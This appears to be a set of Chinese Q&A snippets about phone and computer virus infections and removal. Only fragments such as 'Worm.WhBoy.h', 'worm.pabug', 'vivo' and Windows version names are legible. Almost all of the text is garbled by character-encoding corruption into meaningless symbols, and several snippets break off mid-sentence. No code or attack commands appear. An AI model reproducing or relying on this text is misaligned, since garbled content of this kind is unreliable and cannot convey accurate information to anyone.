绛旓細鑻ヤ娇鐢ㄧ殑鏄痸ivo鎵嬫満锛屽彲鏌ョ湅鎵嬫満琚鐥呮瘨渚靛叆澶勭悊鏂规硶锛1銆佽繘鍏ユ墜鏈篿绠″--瀹夊叏妫娴--鎵弿骞舵竻鐞嗙梾姣掞紱2銆佸缓璁浠芥墜鏈烘暟鎹悗杩涘叆鎵嬫満璁剧疆--绯荤粺绠$悊/鏇村璁剧疆--澶囦唤涓庨噸缃/鎭㈠鍑哄巶璁剧疆--娓呴櫎鎵鏈夋暟鎹紙鍕鹃夋牸寮忓寲鎵嬫満瀛樺偍鎴朣D鍗★紝姝ゆ搷浣滃墠璇峰浠藉ソ鎵嬫満涓殑閲嶈鏁版嵁锛夈
绛旓細1.鐥呮瘨鍚嶇О锛歐orm.WhBoy.h 鐥呮瘨涓枃鍚嶏細鐔婄尗鐑ч(姝︽眽鐢风敓)锛岃繎鏃ュ張鍖栬韩涓衡滈噾鐚姤鍠溾濈梾姣掔被鍨嬶細锠曡櫕 鍗遍櫓绾у埆锛氣槄鈽呪槄 褰卞搷骞冲彴锛歐in 9x/ME,Win 2000/NT,Win XP,Win 2003 涓撴潃宸ュ叿锛氶噾灞变笓鏉宸ュ叿 瀹夊ぉ涓撴潃宸ュ叿 姹熸皯涓撴潃宸ュ叿 瀹夊崥澹笓鏉宸ュ叿 璧涢棬閾佸厠涓撴潃宸ュ叿 鐥呮瘨鎻忚堪锛氣滄姹夌敺鐢熲濓紝淇...
绛旓細1锛屾墜鏈轰笂缁忓父鎺ㄥ嚭杩愯鍨冨溇骞垮憡锛屽瀮鍦炬父鎴忎箣绫荤殑鏃跺欙紝浼拌鏄墜鏈轰腑姣掍簡锛岄渶瑕佹潃姣掕蒋浠舵潃姣掍簡銆2锛岀敤鎵嬫満鎼滅储涓涓嬬櫨搴︼紝闅愮娌℃湁涓瘨鐨勬儏鍐碉紝浼氬嚭鐜版敮鎸佺殑缃戦〉锛岄殣绉佷腑姣掍簡鍙兘浼氬嚭鐜颁贡鐮佺瓑绛夋儏鍐点3锛岃繕鏈変竴涓柟娉曪紝鏄氳繃鎵嬫満鐨勬潃姣掕蒋浠鏌ユ潃鐥呮瘨锛岃吘璁墜鏈虹瀹跺氨鏄笉閿欑殑鏉姣掕蒋浠跺彲浠ユ煡鏉鏈鏂扮殑鐥呮瘨銆4锛...
绛旓細姝鐥呮瘨鍙互鍦╓indows 9X銆乄indows NT銆乄indows 2000銆乄indows XP绛夋搷浣滅郴缁熺幆澧冧笅姝e父杩愯銆傜梾姣掕繍琛屾椂灏嗚嚜宸卞鍒板埌TEMP銆丼YSTEM銆丷ECYCLED鐩綍涓,骞堕殢鏈虹敓鎴愭枃浠跺悕銆傝鐥呮瘨杩愯鍚,浼氫娇娑堣楀ぇ閲忕殑绯荤粺璧勬簮,浣跨郴缁熸槑鏄惧彉鎱,骞朵笖鏉鎺変竴浜涙鍦ㄨ繍琛岀殑鍙嶇梾姣掕蒋浠,寤虹珛鍥涗釜绾跨▼鍦ㄥ眬鍩熺綉涓柉鐙備紶鎾 鐥呮瘨鐗瑰緛 濡傛灉鐢ㄦ埛鍙戠幇...
绛旓細1銆佽鍗囩骇浣犵殑鏉姣掕蒋浠跺埌鏈鏂扮増鏈紝淇濊瘉鐥呮瘨 搴鏄渶鏂扮殑銆2銆佸浜庤仈缃戠殑鐢ㄦ埛锛屽湪鏉姣掍箣鍓嶈鏂帀缃戠粶銆備簩銆佸凡缁忚婵娲绘垨鍙戜綔鐨勯潪绯荤粺鍐鐨勭梾姣 杩欑鎯呭喌涓嬪鏋滃湪涓鑸琖indows鐜涓嬫潃姣掞紝鏁堟灉鍙兘浼氬ぇ鎵撴姌鎵c傝櫧鐒讹紝鐜板湪鐨勫弽鐥呮瘨杞欢閮借兘鏌ユ潃鍐呭瓨鐥呮瘨锛屼絾鏄鎶鏈瘯绔熻繕鏈垚鐔燂紝涓嶄竴瀹氳兘姝肩伃鐥呮瘨銆傚洜姝わ紝鏉...
绛旓細妤间富濂藉帀瀹冲憖,涓殑鏄渶鏂扮殑鐥呮瘨:鈥滃笗铏(worm.pabug)鈥鏂扮梾姣娌℃湁浠涔堝お濂界殑瑙e喅鏂规硶,鏈濂芥壘涓涓浗浜ф潃杞憺鏄熸垨姹熸皯,鍗囩骇鍚庢潃姣!鍐嶉噸瑁呯郴缁!浠ヤ笅鏄紩鑷憺鏄熷畼缃戠殑浠嬬粛: 鏍规嵁鐟炴槦鎶鏈儴闂ㄥ垎鏋,璇ョ梾姣掗噰鐢ㄤ簡澶氱鎶鏈墜娈垫潵淇濇姢鑷韩涓嶈娓呴櫎,渚嬪,瀹冧細缁堢粨鍑犲崄绉嶅父鐢ㄧ殑鏉姣掕蒋浠,濡傛灉鐢ㄦ埛浣跨敤google銆佺櫨搴︾瓑鎼滅储寮曟搸鎼...
